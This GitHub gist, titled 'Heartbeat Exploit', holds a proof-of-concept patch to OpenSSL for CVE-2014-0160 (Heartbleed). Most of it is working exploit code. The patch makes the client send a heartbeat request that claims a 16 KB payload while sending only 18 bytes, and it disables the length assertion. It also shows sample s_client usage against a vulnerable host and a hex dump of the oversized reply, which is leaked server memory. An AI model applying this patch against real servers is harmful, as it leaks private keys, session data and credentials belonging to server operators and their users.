Skip to content

Instantly share code, notes, and snippets.

@alinefr
Created April 9, 2014 16:03
Show Gist options
  • Save alinefr/10286669 to your computer and use it in GitHub Desktop.
Save alinefr/10286669 to your computer and use it in GitHub Desktop.
Heartbeat Exploit
The OpenSSL toolkit stays under a dual license, i.e. both the conditions of
the OpenSSL License and the original SSLeay license apply to the toolkit.
See below for the actual license texts. Actually both licenses are BSD-style
Open Source licenses. In case of any license issues related to OpenSSL
please contact [email protected].
(c) Tim Brown, 2014
<mailto:[email protected]>
<http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/>
PoC exploit for CVE-2014-0160.
If you apply this patch, you will then be able to trigger the bug
as follows:
$ apps/openssl s_client -debug -connect vulnerable:443
...
Verify return code: 20 (unable to get local issuer certificate)
---
client> B
HEARTBEATING
write to 0x1ba0270 [0x1ba9da3] (30 bytes => 30 (0x1E))
0000 - 17 03 03 00 19 bb e6 52-26 20 74 c1 a7 99 fb da .......R& t.....
0010 - 1a 6b 20 cd 8e 33 17 bb-83 a1 9c 73 c6 d2 .k ..3.....s..
write to 0x1ba0270 [0x1ba9da3] (66 bytes => 66 (0x42))
0000 - 18 03 03 00 3d bb e6 52-26 20 74 c1 a8 f7 23 2c ....=..R& t...#,
0010 - 5a de d4 a3 e2 8d 14 e5-be a8 0c 66 2a 54 7d 13 Z..........f*T}.
0020 - 72 ef ba 33 a1 3c 83 6d-0a b9 96 32 7a d3 69 a2 r..3.<.m...2z.i.
read from 0x1ba0270 [0x1ba5853] (5 bytes => 5 (0x5))
0000 - 18 03 03 40 18 ...@.
read from 0x1ba0270 [0x1ba5858] (16408 bytes => 1371 (0x55B))
...
Patch is below:
--- openssl-1.0.2-beta1/ssl/t1_lib.c 2014-02-24 12:36:16.000000000 +0000
+++ openssl-1.0.2~beta1-patched/ssl/t1_lib.c 2014-04-08 10:02:06.819998579 +0100
@@ -3797,6 +3797,7 @@
/* Read type and payload length first */
hbtype = *p++;
n2s(p, payload);
+ printf("asked for %i bytes\n", payload);
pl = p;
if (s->msg_callback)
@@ -3820,6 +3821,8 @@
*bp++ = TLS1_HB_RESPONSE;
s2n(payload, bp);
memcpy(bp, pl, payload);
+ printf("copied %i bytes\n", payload);
+ printf("record was only %i bytes\n", s->s3->rrec.length);
bp += payload;
/* Random padding */
RAND_pseudo_bytes(bp, padding);
@@ -3860,7 +3863,7 @@
{
unsigned char *buf, *p;
int ret;
- unsigned int payload = 18; /* Sequence number + random bytes */
+ unsigned int payload = 0x4000; /* Sequence number + random bytes */
unsigned int padding = 16; /* Use minimum padding */
/* Only send if peer supports and accepts HB requests... */
@@ -3888,7 +3891,7 @@
/* Check if padding is too long, payload and padding
* must not exceed 2^14 - 3 = 16381 bytes in total.
*/
- OPENSSL_assert(payload + padding <= 16381);
+ //OPENSSL_assert(payload + padding <= 16381);
/* Create HeartBeat message, we just use a sequence number
* as payload to distuingish different messages and add
@@ -3913,7 +3916,7 @@
/* Random padding */
RAND_pseudo_bytes(p, padding);
- ret = ssl3_write_bytes(s, TLS1_RT_HEARTBEAT, buf, 3 + payload + padding);
+ ret = ssl3_write_bytes(s, TLS1_RT_HEARTBEAT, buf, 3 + 18 + padding);
if (ret >= 0)
{
if (s->msg_callback)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment